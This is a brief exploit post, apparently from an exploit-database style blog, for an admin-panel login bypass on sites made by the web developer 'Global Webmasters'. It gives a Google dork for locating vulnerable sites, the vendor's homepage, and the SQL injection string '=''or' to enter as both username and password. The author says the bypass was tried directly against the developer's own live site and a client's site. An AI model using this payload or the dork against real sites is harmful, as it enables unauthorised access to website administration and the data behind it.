Global Webmasters - Admin Panel Bypass
# Google Dork: intext:" by GlobalWebmasters"
# Date: 30 December 2017
# Exploit Author: AlHikam0x
# Vendor Homepage: https://www.sajtovi-izrada.com
# Tested on: Ubuntu
Proof of Concept
1. Login Admin Panel. https://web-target/admin or login , etc.
2. Input username and password (bypassing)
Username: '=''or'
Password: '=''or'
I test it directly to the developer site, and the client site also has the same vulnerability.
Development is Vulnerability! https://www.sajtovi-izrada.com/
Post a Comment